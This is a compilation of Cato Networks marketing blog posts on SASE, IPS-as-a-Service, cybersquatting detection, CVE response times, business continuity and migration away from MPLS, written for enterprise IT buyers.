This is the greatness of an IPS-as-a-Service managed by some of the greatest security researchers. Our customers don’t have to perform any maintenance work to their IPS, and can make a much better use of their time: first by communicating to their upper management that their network is already secured and second, if they are using Apache products, by following the vendor’s advisory for remediation. Thanks to Cato, they can patch Apache at their own speed without fear of infiltration and exploitation.
What about the Cato SASE Cloud? Was it exposed?
In short, no. Our engineering and operations teams have worked side by side with our security analysts to investigate our own cloud and confirm that based on everything that we know, we are not vulnerable to this exploit.
Eventually, no one is 100% bullet proof. The test is really about what you have done to minimize the potential risk, and what you can do to mitigate it when it manifests. Cato has all the resources, the skills and the talent to minimize our attack surface, and make sure that our ability to respond to emerging threats is at the maximum. This is the right balance our customers deserve.
Sadly, This Is Not Over Just Yet
As often happens with such high-profile and critical CVEs, more data and IoCs (Indicators of Compromise) are surfacing as more analysts across the IT and cyber communities dive deeper into the case.
Our researchers are continuing their work as well, monitoring new discoveries across the community on the one hand, and running our own research and analysis on the other – all together targeted to make sure our customers remain protected.
In the recent Emerging Technologies and Trends Impact Radar: Communications,1 Gartner expanded our understanding of what it means to be a SASE platform. The Gartner...
New Insight Into SASE from the Recent Gartner® Report on Impact Radar: Communications In the recent Emerging Technologies and Trends Impact Radar: Communications,1 Gartner expanded our understanding of what it means to be a SASE platform.
The Gartner report states, “While the list of individual capabilities continues to evolve and differ between vendors, serving those capabilities from the cloud edge is non-negotiable and fundamental to SASE. There are components of SASE, such as some of the networking features with SD-WAN, that reside on-premises, but everything that can be served from cloud edge should be. A solution with all of the SASE functions integrated into a single on-premises appliance is not a SASE solution.”
To learn more, check out this excerpt of the SASE text from the report:
Secure Access Service Edge (SASE)
Analysis by: Nat Smith
Description:
Secure access service edge (SASE, pronounced “sassy”) delivers multiple converged network and security as a service capabilities, such as SD-WAN, secure web gateway (SWG), cloud access security broker (CASB), firewall, and zero trust network access (ZTNA). SASE supports branch office, remote worker and on-premises general internet security use cases. SASE is primarily delivered as a service and enables dynamic zero trust access based on the identity of the device or entity, combined with real-time context and security and compliance policies.
SASE is evolving from five contributing security and network segments: software-defined wide-area network (SD-WAN), firewall, SWG, CASB and ZTNA. The consolidation of offerings into a single SASE market continues to increase buyer interest and demand. Several vendors offer completely integrated solutions already, and many vendors offer intermediary steps, usually consolidating five products into two. Consolidation and integration of capabilities is one of the main drivers for buyers moving to SASE. This is more important than best-of-breed capabilities for the moment, but that will change as consolidated, single-vendor solutions become more mature.
While the list of individual capabilities continues to evolve and differ between vendors, serving those capabilities from the cloud edge is non-negotiable and fundamental to SASE. There are components of SASE, such as some of the networking features with SDWAN, that reside on-premises, but everything that can be served from cloud edge should be. A solution with all of the SASE functions integrated into a single on-premises appliance is not a SASE solution.
[boxlink link="https://catonetworks.easywebinar.live/registration-77?utm_source=blog&utm_medium=top_cta&utm_campaign=strategic_roadmap_webinar"] Strategic Roadmap for SASE | Watch Now [/boxlink]
Range: 1 to 3 Years
Even though some vendors are not implementing all portions of SASE on their own today, Gartner estimates SASE is about one to three years away from early majority adoption. There are several factors or use cases that we predict will drive the speed of adoption. Consolidation of administration and security enforcement of cloud services, network edge transport, and content protection features drives higher efficiency and scale for remote workers and cloud services. There are three key market segments that we expect to consolidate and serve as components of SASE: these are SWG, CASB and ZTNA. The majority of end users have already transitioned to cloud-based services or are actively doing so now. Second, instead of five components loosely from separate vendors, a single SASE offering with all five components converged into a single offering is the other activity to watch. Several vendors offer complete SASE solutions today and those solutions are maturing quickly. Because of the availability of these two factors, or use cases, buyer adoption is picking up.
Mass: High
Mass is high because SASE has a direct impact on the future of its five contributing market segments — SD-WAN, firewall, SWG, CASB and ZTNA — predicting that they will largely go away, eventually to be engulfed by SASE. Client interest, Google searches, and analyst opinion further validate the likelihood of SASE. Further adding to mass, SASE is also appropriate across all industries and multiple business functions. The changes required for offerings in the contributing segments to evolve to a SASE cloud edge-based solution are significant for some of these contributing markets. The density of this change is high — not only because this affects five segments, but some of these segments are quite large. Appliance-based products will need to transform into cloud native services, not merely cloud-hosted virtual machines (VMs). However, a cloud-native service alone is not sufficient — vendors will also need points of presence (POPs) or cloud edge presence as well, which may require substantial investment or partnerships.
Recommended Actions:
Create a migration path that gives buyers the flexibility to easily adopt SASE capabilities when ready while still being able to use and manage their existing network and security investments. Most buyers will need to work in a hybrid environment of part SASE and part traditional elements for an extended period of time.
Fill out your portfolio or aggressively partner through deep integration to cover any gaps in the SASE offering. Products in the five contributing segments will increasingly become undesirable to buyers if they do not have a convergence path to SASE.
Develop cloud-native components as scalable microservices that can all process packets in a single pass. In a highly competitive SASE market, agility and cost will increasingly become important, and microservices provide both of these benefits. Build a network of distributed points of presence (POPs) through colocation facilities, service provider POPs or infrastructure as a service (IaaS) to reduce latency and improve performance for network security services. The evolution to SASE also requires an evolution of product delivery vehicles.
Gartner Disclaimer: GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
1Gartner, “Emerging Technologies and Trends Impact Radar: Communications”, Christian Canales, Bill Ray, Kosei Takiishi, Andrew Lerner, Tim Zimmerman, Simon Richard, 13 October 2021
A technique long used for profiting from the brand strength of popular domain names is finding increased use in phishing attacks. Cybersquatting (also called domain...
Cato Networks Adds Protection from the Perils of Cybersquatting A technique long used for profiting from the brand strength of popular domain names is finding increased use in phishing attacks. Cybersquatting (also called domain squatting) is the use of a domain name with the intent to profit from the goodwill of a trademark belonging to someone else. Increasingly, attackers are tapping cybersquatting to harvest user credentials.
Last month, one such campaign targeted 1,000 users at a high-profile communications company with an email containing a supposed secure file link from an email security vendor. Once clicked, the link led to a spoofed Proofpoint page with login links for different email providers.
So prevalent are these threats that Cato Networks has added cybersquatting protection to our service. Over the past month, we’ve detected 5,000 unique squatted domains for more than 50 well-known trademarks. These domains follow certain patterns. By understanding these patterns, you’ll be more likely to protect your organization from this new threat.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise | Download eBook [/boxlink]
Types of Cybersquatting
There are several techniques for creating domains that may trick unsuspecting users. Here are four of the most common:
Typosquatting
Typosquatting creates domain names that incorporate typical typos users input when attempting to access a legitimate site. A perfect example is catonetwrks.com, which leaves out the “o” in networks. The user mistypes Cato’s Web site and ends up interacting with another site used to spread misinformation, redirect the user, or download malware to the user’s system.
Combosquatting
Combosquatting creates a domain that combines the legitimate domain with additional words or letters. For example, cato-networks.com adds a hyphen to Cato’s URL catonetworks.com. Combosquatting is often used for links in phishing emails.
Here are two examples of counterfeit websites that use combosquatting to prompt the user to submit sensitive information. The domain names, amazon-verifications[.]com and amazonverification[.]tk, make the user think they are interacting with a legitimate website owned by Amazon.
[caption id="attachment_20714" align="alignnone" width="860"] Figure 1- Examples of combosquatting[/caption]
Levelsquatting
Levelsquatting inserts the target domain into the subdomain of the cybersquatting URL. This attack usually targets mobile device users who may only see part of the URL displayed in the small mobile-device browser window. A perfect example of levelsquatting would be login.catonetworks.com.fake.com. The user may only see the prefix of login.catonetworks.com on his Apple or Android screen and thinks it’s a legitimate Cato Networks login site.
Homographsquatting
Homographsquatting uses various character combinations that resemble the target domain visually. One example is catonet0rks.com, which uses a zero digit that looks like the letter “o” or ccitonetworks.com, where the combination of “c” and “i” after the initial “c” looks to users like the letter “a.”
Homographsquatting can also use Punycode to include non-ASCII characters in international domain names (IDN). An example would be cаtonetworks.com (xn--ctonetworks-yij.com in Punycode). In this case the “a” is a non-ASCII character from the Cyrillic alphabet.
Here is a non-malicious example of a Facebook homograph domain (xn--facebok-y0a[.]com in Punycode) offered for sale. The squatted domain is used for the owner’s personal profit.
[caption id="attachment_20716" align="alignnone" width="1600"] Figure 2- Example of homographsquatting targeting Facebook users[/caption]
And here is another use of homographsquatting, this time going after Microsoft users. The domain name - nnicrosoft[.]online – uses double “n”s to look like the “m” in “microsoft.”
[caption id="attachment_20718" align="alignnone" width="1600"] Figure 3- Example of homographsquatting targeting Microsoft users[/caption]
How to Detect Cybersquatting
To detect cybersquatted domains, Cato Networks uses a method called Damerau-Levenshtein distance. This approach counts the minimum number of operations (insertions, deletions, substitution, or transposition of two adjacent characters) needed to change one word into the other.
For example, netflex.com has an edit distance of 1 from the legitimate site, netflix.com via the substitution the “i” character with “e”.
[caption id="attachment_20722" align="alignnone" width="861"] Figure 4 – Substitution of the “i” character with an “e” in the netflix domain.[/caption]
Cato Networks configures the edit distance used to classify squatted domains dynamically for each squatted trademark, taking into consideration the length and word similarity. Think of the words that can be generated with a 2 edit distance from the name Instagram or DHL, for example.
We also look at who registered the domain. You might be surprised to learn that many domains of trademarks with common typos are registered by the trademark owner to redirect the user to the correct site. Detecting a domain registered by anyone other than the trademark owner arouses suspicion.
Checking the domain age and registrar also turns up clues. Newly registered domains and domains from low-reputation registrars are more likely to be associated with unwanted and malicious activity than others.
Separating Squatted from Non-squatted Domains
In October 2021 alone, Cato Networks used these methods to detect more than 5,000 unique squatted domains for more than 50 well-known trademarks. The graphic below shows that fewer than 20% were owned by the legitimate trademark owner.
[caption id="attachment_20724" align="alignnone" width="1200"] Figure 5 – Distribution of ownership in the detected domains.[/caption]
Additionally, Cato’s data shows that legitimate companies tend to register domains that include their trademark with combinations of other characters and typical typos. Domains that are not registered by trademark owners tend to have a higher percentage of trademarks in the subdomain level, i.e. levelsquatting.
[caption id="attachment_20726" align="alignnone" width="1200"] Figure 6 - Distribution of squatting techniques in domains not registered by trademark owners.[/caption]
Finally, this graphic of Cato Networks data shows that many of the squatted domains target search engines, social media, Office suites and e-commerce websites.
[caption id="attachment_20728" align="alignnone" width="1200"] Figure 7- Top targeted trademarks.[/caption]
Don’t Wait to Identify Cybersquatting
There is no doubt that cybersquatting can be used in a variety of ways to target unsuspecting users and companies for a data breach. Organizations need to educate themselves on the perils of cybersquatting and incorporate tools and techniques for detecting phishing and other attacks that use this method for nefarious purposes. The good news is that Cato customers can now take advantage of Cato’s cybersquatting detection to protect their users and precious data.
IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an...
IPS Features and Requirements: Is an Intrusion Prevention System Enough? IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacking temporary exploits can all be prevented with an IPS.
However, an IPS alone is not always enough to deal with the growing number of cyber attacks, which are negatively impacting business continuity through ransomware, network outages and data privacy breaches. This blog post explores how to implement an IPS in your overall security strategy with SASE. But first, let’s learn a bit more about IPS.
[boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=eliminate_threat"] Eliminate Threat Intelligence False Positives with SASE
| Get eBook [/boxlink]
IPS vs. IDS - What’s the Difference?
IPS is often confused with IDS (Intrusion Detection System). IDS is the older generation of IPS. As the name implies, it detects and reports malicious activities, without any active blocking mechanisms. As a result, an IDS requires more active attention from IT to immediately block suspicious traffic, but on the other hand, legitimate traffic is never accidentally blocked, as sometimes happens with IPS. IPS is also sometimes referred to as IDPS.
IPS Features – How it Works
Most IPS solutions sit behind the firewall, though one type of IPS, HIPS (host-based IPS) sits on endpoints. The IPS mechanism operates as follows.
The IPS:
Scans and analyzes network traffic, and watches packet flows
Detects suspicious activities
Sends alarms to IT
Drops malicious packets
Blocks traffic
Resets connections
How Does IPS Detect Malicious Activity?
There are two methods the IPS can implement to accurately detect cyberattacks.
1. Signature-based Detection
IPS compares packet flows with a dictionary of CVEs and known patterns. When there is a pattern match, the IPS automatically alerts and blocks the packets. The dictionary can either contain patterns of specific exploits, or educated guesses of variants of known vulnerabilities.
2. Anomaly-based Detection
IPS uses heuristics to identify potential threats by comparing them to a known and approved baseline level and alerting in the case of anomalies.
IPS Requirements
IPS needs to ensure:
Performance – to enable network efficiency
Speed – to identify exploitations in real-time
Accuracy – to catch the right threats and avoid false positives
IPS Joined with the Power of SASE
While IPS was built as a stand-alone solution, today it is best practice to complement it and enhance its capabilities by using IPS that is delivered as part of a SASE solution. This also enables IT to overcome the shortcomings of the stand-alone IPS:
Stand-alone IPS: Shortcomings
Inability to process encrypted packets without this having a huge impact on performance
Perimeter-based approach, which protects from incoming traffic only, and not from internal threats. (Read more about it in our ZTNA hub).
Inspection that is location-bound and does not usually include mobile and cloud traffic
High operational costs when IT updates new signatures and patches
IPS and SASE: Key Benefits
SASE is a global, cloud-native service that converges networking and security functions in one platform. By implementing IPS with SASE, IPS will:
Ensure high performance – scans and analyzes TLS-encrypted traffic without any capacity constraints that would affect performance or scaling capabilities
Secure the network, not the perimeter – inspects inbound and outbound traffic, both on a WAN or to and from the public Internet
Scan and protect all edges - includes remote users and branches, regardless of location and infrastructure (cloud or other)
Always secure and up-to-date – automatically updates the latest signatures, since these updates come from the SASE cloud, without any hands-on involvement from IT
Reducing the Attack Surface with IPS and SASE
IPS adds an important layer of security to enterprise networks, especially in this day and age of more and more highly sophisticated cyber attacks. However, to get the most out of IPS, while reducing IT overhead and costs, it is recommended to implement an IPS together with SASE.
This provides organizations with all IPS capabilities, across their entire network and for all traffic types. In addition, with SASE, the security signatures and patches are managed entirely by the SASE cloud, eliminating false positives and removing resource-intensive processes from IT’s shoulders.
Cato is the leading SASE provider, enabling organizations to securely and optimally connect any user to any application anywhere on the globe. To get a consultation or a demo of the Cato SASE Cloud and how it works with IPS, Contact Us.
Business continuity planning (BCP) is all about being ready for the unexpected. While BCP is a company-wide effort, IT plays an especially important role in maintaining...
November 21, 2021
5m read
3 Principles for Effective Business Continuity Planning Business continuity planning (BCP) is all about being ready for the unexpected. While BCP is a company-wide effort, IT plays an especially important role in maintaining business operations, with the task of ensuring redundancy measures and backup for data centers in case of an outage.
With enterprises migrating to the cloud and adopting a work-from-anywhere model, BCP today must also include continual access to cloud applications and support for remote users. Yet, the traditional network architecture (MPLS connectivity, VPN servers, etc.) wasn’t built with cloud services and remote users in mind. This inevitably introduces new challenges when planning for business continuity today, not to mention the global pandemic in the background.
Three Measures for BCP Readiness
In order to guarantee continued operations to all edges and locations, at all times – even during a data center or branch outage – IT needs to make sure the answer to all three questions below is YES.
Can you provide access to data and applications according to corporate security policies during an outage?
Are applications and data repositories as accessible and responsive during an outage as during normal operations?
Can you continue to support users and troubleshoot problems effectively during an outage?
If you can’t answer YES to all the above, then it looks like your current network infrastructure is inadequate to ensure business continuity when it comes to secure data access, optimized user experience, and effective visibility and management.
[boxlink link="https://www.catonetworks.com/resources/business-continuity-planning-in-the-cloud-and-mobile-era-are-you-prepared/?utm_source=blog&utm_medium=top_cta&utm_campaign=business_continuity+"] Business Continuity Planning in the Cloud and Mobile Era
| Get eBook [/boxlink]
The Challenges of Legacy Networks
Secure Data Access
When a data center is down, branches connect to a secondary data center until the primary one is restored. But does that guarantee business operations continue as usual? Although data replication may have operated within requisite RTO/RPO, users may be blocked from the secondary data center, requiring IT to update security policies across the legacy infrastructure in order to enable secure access.
When a branch office is down, users work from remote, connecting back via the Internet to the VPN in the data center. Yet VPN wasn’t designed to support an entire remote workforce simultaneously, forcing IT to add VPN servers to address the surge of remote users, who also generate more Internet traffic, resulting in the need for bandwidth upgrade. If a company runs branch firewalls with VPN access, challenges become even more significant, as IT must plan for duplicating these capabilities as well.
Optimized User Experience
When a data center is down, users can access applications from the secondary data center. But, if the performance of these applications relies on WAN optimization devices, IT will need to invest further in WAN optimization at the secondary data center, otherwise data transfer will slow down to a crawl. The same is true for cloud connections. If a premium cloud connection is used, these capabilities must also be replicated at the secondary data center.
When a branch office is down, remote access via VPN is often complicated and time-consuming for users. When accessing cloud applications, traffic must be backhauled to the data center for inspection, adding delay and further undermining user experience. The WAN optimization devices required for accelerating branch-datacenter connections are no longer available, further crippling file transfers and application performance. In addition, IT needs to configure new QoS policies for remote users.
Effective Visibility and Management
When a data center is down, users continue working from branch offices, and thus user management should remain the same. This requires IT to replicate management tools to the secondary data center in order to maintain user support, troubleshooting, and application management.
When a branch office is down, IT needs user management and traffic monitoring tools that can support remote users. Such tools must be integrated with existing office tools to avoid fragmenting visibility by maintaining separate views of remote and office users.
BCP Requires a New Architecture
Legacy enterprise networks are composed of point solutions with numerous components – different kinds of network services and cloud connections, optimization devices, VPN servers, firewalls, and other security tools – all of which can fail.
BCP needs to consider each of these components; capabilities need to be replicated to secondary data centers and upgraded to accommodate additional loads during an outage. With so much functionality concentrated in on-site appliances, effective BCP becomes a mission impossible task, not to mention the additional time and money required as part of the attempt to ensure business continuity in a legacy network environment.
SASE: The Architecture for Effective BCP
SASE provides the adequate underlying infrastructure for BCP in today’s digital environment. With SASE, a single, global network connects and secures all sites, cloud resources, and remote users. There are no separate backbones for site connectivity, dedicated cloud connections for optimized cloud access, or additional VPN servers for remote access.
As such, there’s no need to replicate these capabilities for BCP. The SASE network is a full mesh, where the loss of a site can’t impact the connectivity of other locations. Access is restricted by a suite of security services running in cloud-native software built into the PoPs that comprise the SASE cloud. With optimization and self-healing built into the SASE service, enterprises receive a global infrastructure designed for effective BCP.
We just made an announcement today that’s a textbook example of the power of our IPS. All mobile users, offices, and cloud resources anywhere in...
November 17, 2021
5m read
How Cato Was Able to Meet the CISA Directive So Quickly We just made an announcement today that’s a textbook example of the power of our IPS. All mobile users, offices, and cloud resources anywhere in the world on the Cato SASE Cloud are now protected against network-based threats exploiting the exposures the Cybersecurity and Infrastructure Security Agency (CISA) identified two weeks ago. Actually, the time to implement those protections in the field was closer to 10 days.
For someone in security research that’s an amazing accomplishment. It’s not just that we developed signatures to record time. Alone that would be significant. It’s that we were able to get those signatures implemented in production across all of our customers and without their intervention so quickly. Let me explain.
THE CISA DIRECTIVE
Two weeks ago, the CISA issued a Binding Operational Directive (BOD) forcing federal agencies to remediate known and exploited vulnerabilities within CISA’s given timeline. Some 300 previously exploited vulnerabilities were identified, 113 of which had to be addressed by today. Their guidance is to remediate these vulnerabilities on their information systems, mainly by patching the announced vulnerable products to their latest versions.
While none of the vulnerabilities were found in the Cato SASE Cloud, we wanted to protect our customer against any relevant network-based threats. Upon arrival of CISA’s announcement through one of our many threat intelligence feeds, we triaged the IOCs to identify those vulnerabilities that fell within scope of our IPS, finding public or hidden information to get a correct reproduction of the exploit.
Some of the vulnerabilities announced by CISA were ones that didn’t have any public exploit. In such a case, reproducing the exploit is unfeasible and the vendor of the vulnerable product is responsible for releasing a patch and/or providing workarounds. The only exception for this case is Microsoft vulnerabilities, which we can handle thanks to our collaboration with Microsoft as part of the Microsoft Active Protection Plan (MAPP). As members of MAPP Microsoft share with us detailed information to allow mitigation of vulnerabilities found in their products.
Many of the vulnerabilities had already been triaged and mitigated last year. Out of the 113 CVEs (Common Vulnerabilities and Exposures) that CISA asked to be patched by November 17th, we identified 36 vulnerabilities that were within scope. (We’re currently in the process of handling the rest of the vulnerabilities in the catalog, which CISA asked to be patched by May 2022.)
[boxlink link="https://www.catonetworks.com/resources/sase-vs-sd-wan-whats-beyond-security?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] SASE vs SD-WAN
| What’s Beyond Security [/boxlink]
THE IPS PROBLEM
Normally, getting 36 signatures developed and deployed in the field would take weeks. Oh, yes, often legacy security vendors are proud of the speed by which they develop IPS signatures. What they ignore is the time IT then needs to take to implement those signatures.
Every signature must be first assessed for their relevance and performance impact on the IPS. Then they need to run the IPS on live traffic in detect mode only, checking to see what false positives are generated and identifying any end user disruption. Only afterwards can IT deploy an IPS signature in full production. Often, though, the headaches cause many to leave legacy IPS in detect mode and ignore its alerts, wasting their IPS resource.
But with Cato Managed IPS-as-a-Service, none of that is an issue. Our IPS runs as part of Cato’s global cloud-native platform. The cloud’s ubiquitous resources eliminate legacy IPS performance issues.
Cato’s advanced behavioral signatures are also vastly different than legacy IPS signatures. Our signatures are context-aware, synthesizing indicators across multiple network and security domains normally unavailable to a legacy IPS. We can do this because as a global SASE platform, we’ve built a simply massive data lake from the metadata of every flow crossing the Cato global private backbone. For security researchers, like myself, this sort of data is like gold, letting us develop incredibly precise signatures that are more accurate (reducing false positives) and more effective (reducing false negatives).
For each CVE, Cato validates the IPS signature against real-traffic data from our data lake. This unique data resource allows Cato to run through “what if” scenarios to ensure their efficacy. Only then do we push them to the production network in silent mode, monitor the results, and eventually switch them to global block-mode.
What About Those Out of Scope?
Cato protects organizations against network-based threats but even endpoint attacks often have a network-based component. Cato’s IPS inspects inbound, outbound, and WAN-bound network traffic. This means that endpoint vulnerabilities are out of scope. Nevertheless, we do have mitigation mechanisms that would block potential exploitation of such CVEs further down the attack kill chain, such as Next Generation Anti-Malware (for blocking of malware dropping), reputation feeds (for blocking of malicious IPs/domains, CNC communication, and other IoCs) and more.
What Else Should Cato Customers Do?
If you have the Cato IPS enabled, you are protected from these vulnerabilities with no manual configuration changes required on your part. However, to ensure complete protection from vulnerabilities out of Cato’s scope, we advise following vendor advisories to mitigate and update your systems and patch them to the latest version.
A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal...
November 16, 2021
6m read
What Makes for a Great IPS: A Security Leader’s Perspective A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal vulnerability that can be used to map and leak files was already known to be exploited in the wild. Companies were urged to deploy the patch as quickly as possible.
But Cato customers could rest easy. Like so many recent attacks and zero-day threats, Cato security engineers patched CVE-2021-41773 in under a week and, in this case, in just one day. What’s more the intrusion prevention system (IPS) patch generated zero false positives, which are all too common in an IPS. Here’s how we’re able to zero-day threats so quickly and effectively.
Every IPS Must Be Kept Up-To-Date
Let's step back for a moment. Every network needs the protection of an IPS. Network-based threats have become more widespread and an IPS is the right defensive mechanism to stop them.
But traditionally, there have been so much overhead associated with an IPS that many companies failed to extract sufficient value from their IPS investments or just avoided deploying them in the first place. The increased use of encrypted traffic, makes TLS/SSL inspection essential. However, inspecting encrypted traffic degrades IPS performance. IPS inspection is also location bound and often does not extend to cloud and mobile traffic.
Whenever a vulnerability notice is released, it’s a race of who acts first—the attackers or the IT organization. The IPS vendors may take days to issues a new signature. Even then the security team needs more time to first test the signature to see if it generates false positives before deploying it on live network.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise | Here's how we can help! [/boxlink]
Cato Has a Fine-Tuned Process to Respond Quickly to Vulnerabilities
The Cato SASE Cloud has an IPS-as-a-service that is fully integrated with our global network, bringing context-aware protection to users everywhere. Unlike on-premises IPS solutions, even users and resources outside of the office benefit from IPS protection.
Cato engineers are also fully responsible for the maintenance of this critical component of our security offerings. Our processes and architecture enable incredible short time to remediate, like patching the above-mentioned Apache vulnerability in just one day. Other example response times to noted vulnerabilities include:
Date
Vulnerability
Cato
Response
February 2021
VMWare VCenter RCE (CVE-2021-21972)
2 days
March 2021
MS Exchange SSRF (CVE-2021-26855)
3 days
March 2021
F5 Vulnerability (CVE-2021-22986)
2 days
July 2021
PrintNightmare Spooler RCE Vulnerability (CVE-2021-1675)
3 days
September 2021
VMware vCenter RCE (CVE-2021-22005)
1 day
In the case of the VMware vCenter RCE vulnerability, an exploit was released in the wild and threat actors were known to be using it. This made it all the more critical to get the IPS patched quickly.
Cato Delivers Security Value to Customers
Cato eliminates the time needed to get the change management approved, schedule a maintenance window, and find resources to update the IPS by harnessing a machine learning algorithm, our massive data lake, and security expertise.
The first step in the process is to automate collection of threat information. We use different sources for this information, creating a constant feed of threats for us to analyze. Among others, the main sources for threat information are:
The National Vulnerability Database (NVD) published by NIST
Social media, including tweets about CVEs that help us understand their importance
Microsoft’s Active Protection Plan (MAPP), a monthly report of vulnerabilities in this company’s products, along with mitigation guidelines
The next step is to apply smart filtering. Many CVEs and vulnerabilities might be out of Cato's IPS scope. This mainly includes threats that are locally exploited, or ones that won't generate any network traffic that passes through our points of presence (PoPs). Mainly based on the NVD classification, we’re able to tell in advance if they are out of scope, making sure that we don’t waste time on threats that are irrelevant to our secure access service edge (SASE) platform.
Once we know which vulnerabilities we need to research, we assess their priorities using a couple of techniques. We measure social media traction using a proprietary machine learning service. Next, we estimate the risk of potential exploitations and the likelihood of the vulnerable product being installed at our customers’ premises. This latter step is based on Internet research, traffic samples, and simple common sense.
On top of all the above steps, we run mechanisms to push-notify our team in case of a vulnerability hitting significant media traction on both mainstream cybersecurity media as well various hackers’ networks. We have found this to be a great indicator for the urgency of vulnerabilities.
Time is Important but Accuracy is Critical
Keeping an IPS up to date with timely threat information is important but accuracy of the signatures is even more so. Nobody wants to deal with multitudes of false positive alerts. Cato makes a concerted effort to reduce our false positive rate down to zero. Once a threat is analyzed and a signature is available, we run the following procedure:
We reproduce an exploit, as well as possible variations of it, in a development environment so that we can thoroughly test the threat signature.
We run a “what if” scenario on sample historical traffic from our data lake to understand what our signature should trigger once deployed to our PoPs. This is a very strong tool to save us the back-and-forth process of amending signatures that hit on legitimate traffic. Another benefit of this step is that we can test if an attack attempt has already happened. On-premises IPS vendors can’t do this last step.
We deploy the signature to production in silent mode and monitor the signature’s hits to make sure it’s free of false positives.
Once we are confident the signature is highly accurate, we move it into block mode.
All told, this process takes between a couple of hours and a couple of weeks, based on the threat's priority.
Cato Provides Other Advantages Too
Cato's solution shifts the heavy security processing burden from an appliance to the cloud, all while eliminating performance issues and false positives. It’s worth mentioning again that all of the work to investigate vulnerabilities, create custom signatures to mitigate them, and deploy them across the entire network is all on Cato. Customers do not need to do a thing other than keep up with our latest security updates on the Release Notes to realize the benefits of an up-to-date and highly accurate IPS.
To learn more about the features and benefits of Cato’s IPS service, read Cato Adds IPS as a Service with Context-Aware Protection to Cato SD-WAN.
In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your...
How to Terminate Your MPLS Contract Early In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating your MPLS contract, so you can find more flexible solutions (like SASE).
This blog post is based on the e-book “How to Terminate Your MPLS Contract Early”, which you can view here.
4 Steps for Your Get-Off-MPLS Strategy
Here are the four steps we recommend to help you make a smooth transition from MPLS to the solution of your choice, like SASE:
Understand the scope and terms of your MPLS contract
Identify the MPLS circuits that can (and should) be replaced
Involve your internal finance partners
Use these negotiating tactics with your MPLS provider
Now let’s dive into each one of them.
1. Understand the Scope and Terms of your MPLS Contract
MPLS contracts are long legal documents, but it’s important to understand which terms and conditions you’re obliged to. Here are some important things to look out for:
Does your termination date refer to the entire agreement, or to single MPLS circuits? In most contracts, the latter is the case. This means that your organization might have a number of separate terms for various circuits with different start and end dates. In such cases, it’s recommended to identify circuits that are about to expire the soonest to start the migration with them.
Is there a Minimum Annual Revenue Commitment (MARC)? Many MPLS contracts require a minimal monthly or annual spend. If you retire one of your circuits, and your spending diminishes to below that minimum. you might be subject to a financial penalty.
What is your liability for terminating an MPLS circuit before the termination date? Do you have to pay the entire sum of the fees, or maybe some of them? Discontinuing might still be worth it, despite the fees.
What’s your notice of termination period? Check how early you have to notify the carrier about discontinuing services.
Are you subject to automatic renewal? Are you locked into the contract unless you notify the carrier otherwise?
By understanding what your contract requires, you can now proceed to the next steps of determining your termination and transition plan.
[boxlink link="https://www.catonetworks.com/resources/terminate-your-mpls-contract-early-heres-how/?utm_source=blog&utm_medium=top_cta&utm_campaign=terminate_mpls"] Terminate Your MPLS Contract Early | Here's How [/boxlink]
2. Identify the MPLS Circuits that Can (and Should) Be Replaced
To get a better picture of your available termination options, we recommend preparing a spreadsheet that will help you determine which circuits to target first:
Create a row for each circuit
Detail the liabilities and termination dates for each one.
Order the circuits according to termination dates to see which ones can be migrated the soonest.
Identify circuits that can be terminated without violating MARC and incurring penalties
Check the monthly rate for circuits, in case you want to overlap through the migration
Termination Date
Liabilities
Termination Penalty
MARC Violation (Y/N)
Monthly Rate (Y/N)
Circuit A
Circuit B
Circuit C
Now that you have your circuit status laid out, identify additional factors that will influence your migration options and negotiation:
How much are you spending with your carrier overall? Even if you have early MPLS termination fees, you may be able to negotiate and leverage additional services to help waive them.
What’s the ROI of your services after switching to SASE? The numbers will help you decide which penalties are worth paying.
Now that you’ve identified different action plans, it’s time to get the finance department involved.
Migrating from MPLS to SASE with Cato Networks
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Learn more.
If you’re like many of the IT leaders we encounter, you’re likely facing a refresh on your firewall appliances or will face one soon enough....
The Future of the Enterprise Firewall is in The Cloud If you're like many of the IT leaders we encounter, you're likely facing a refresh on your firewall appliances or will face one soon enough. And while the standard practice was to exchange one firewall appliance for another, increasingly, enterprises seem to be replacing firewall appliances with firewall-as-a-service (FWaaS).
Yes, that's probably not news coming from Cato. After all, we've seen more than 1,000 enterprises adopt Cato's FWaaS to secure more than 300,000 mobile users and 15,000 branch offices. And in every one of those deployments, FWaaS displaced firewall appliances.
But it's not just Cato who's seeing this change. Last year, Gartner® projected that by 2025, 30% of new distributed branch office firewall deployments would switch to FWaaS, up from less than 5% in 2020.1
And just this week, for the first time, Gartner included Cato in its "Magic QuadrantTM for Network Firewalls” for the FWaaS implementation of a cloud-native SASE architecture, the Cato SASE Cloud.2"
What's Changing for FWaaS
